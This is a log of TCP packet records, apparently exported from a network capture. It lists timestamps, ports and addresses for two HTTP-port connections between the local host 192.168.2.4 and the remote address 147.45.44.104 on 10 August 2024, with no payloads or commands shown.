Aug 10, 2024 16:12:24.481404066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481419086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481451035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481463909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481482029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481508017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481514931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481527090 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481547117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481580973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481594086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481640100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481848001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481879950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481899977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481913090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481947899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481964111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481966019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482018948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482037067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482050896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482081890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482108116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482110023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482135057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482151031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482166052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482172012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482215881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482247114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482266903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482279062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482285023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482310057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482342958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482373953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482381105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482398987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482405901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482419968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482438087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482474089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482485056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482505083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482537985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482564926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482568979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482600927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482609034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482633114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.482659101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.482681990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483172894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483205080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483223915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483242035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483253956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483285904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483316898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483356953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483366013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483366013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483416080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483448029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483488083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483493090 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483532906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483535051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483567953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483575106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483598948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483632088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483652115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483663082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483669996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483694077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483721972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483726025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483732939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483757973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483771086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483788013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483822107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483823061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483882904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.483889103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483922005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483952999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.483962059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484018087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484421968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484448910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484472990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484489918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484529018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484575033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484580040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484611988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484612942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484652042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484661102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484692097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484724045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484747887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484755993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484787941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484796047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484838009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484869957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484885931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484936953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.484961033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.484993935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485025883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485058069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485090971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485090971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485090971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485090971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485105991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485124111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485156059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485168934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485188007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485196114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485219955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485228062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485250950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485258102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485280991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485312939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485327005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485340118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485373020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485388041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485405922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485424042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485424995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485439062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485445976 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485454082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485455036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485470057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485471964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485485077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485488892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485498905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485515118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485523939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485529900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485543966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485544920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485562086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485563040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485574007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.485582113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485608101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.485608101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491113901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491164923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491170883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491184950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491226912 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491259098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491274118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491286039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491367102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491381884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491473913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491487980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491502047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491516113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491530895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491544962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491544962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491544962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491559029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491559029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491559029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491559029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491568089 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491760015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.491945028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491957903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491971970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.491986036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492002010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492017984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492018938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492024899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492048025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492053032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492053032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492063999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492078066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492091894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492100954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492100954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492115974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492130995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492131948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492131948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492146015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492161036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492172956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492187977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492202044 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492202044 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492202997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492228031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492242098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492255926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492270947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492286921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492300034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492306948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492314100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492330074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492330074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492330074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492347956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492356062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492369890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492382050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492393017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492412090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492412090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492424011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492438078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492446899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492453098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492528915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492531061 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492542982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492544889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492558956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492573977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492588997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492589951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492589951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492602110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492611885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492624998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492625952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492635965 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492640972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492655039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492679119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492693901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492707968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492721081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492731094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492731094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492732048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492736101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492743015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492752075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492765903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492773056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492773056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492788076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492789984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492804050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492818117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492862940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492862940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492886066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492899895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492913008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.492985964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492985964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.492985964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493024111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493036985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493052006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493067026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493113041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493113041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493113041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493113041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493304968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493320942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493335009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493347883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493361950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493376017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493400097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493412971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493412971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493412971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493413925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493412971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493441105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493462086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493469000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493490934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493520975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493529081 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493535042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493549109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493565083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493578911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493609905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493609905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493609905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493609905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493626118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493732929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493756056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493769884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493793964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493808031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493813992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493813992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493813992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493822098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493832111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493855000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493858099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493868113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493872881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493889093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493902922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493916035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.493927956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493927956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493927956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.493942022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494003057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494016886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494029999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494056940 CEST	49740	80	192.168.2.4	147.45.44.104
